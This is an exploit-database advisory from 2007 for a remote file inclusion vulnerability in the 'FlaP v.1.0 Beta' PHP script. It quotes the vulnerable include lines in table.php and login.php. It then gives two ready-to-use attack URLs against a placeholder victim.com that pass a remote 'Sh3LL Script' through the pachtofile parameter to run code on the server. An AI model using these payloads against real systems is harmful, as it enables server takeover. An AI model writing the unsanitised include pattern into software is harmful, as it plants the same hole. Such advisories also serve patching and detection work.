exploit-db-mirror/exploits/php/webapps/3992.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

54 lines
No EOL
3.6 KiB
Text

##############################################################################################
# FlaP v.1.0. Beta <= Remote File Inclusion Vulnerability #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:skin/html/table.php #
# #
# <? include "$pachtofile/left_menu.php"; <<< RFI CODE #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR2:login.php #
# #
#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE #
# #
# #
#BUG2: #
# #
#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################
##############################################################################################
# #
#Script Download #
##############################################################################################
# #
#http://scripts.protoplex.ru/scripts_show/1854.html #
# #
##############################################################################################
# #
#Cyber-Security #
# #
##############################################################################################
# milw0rm.com [2007-05-25]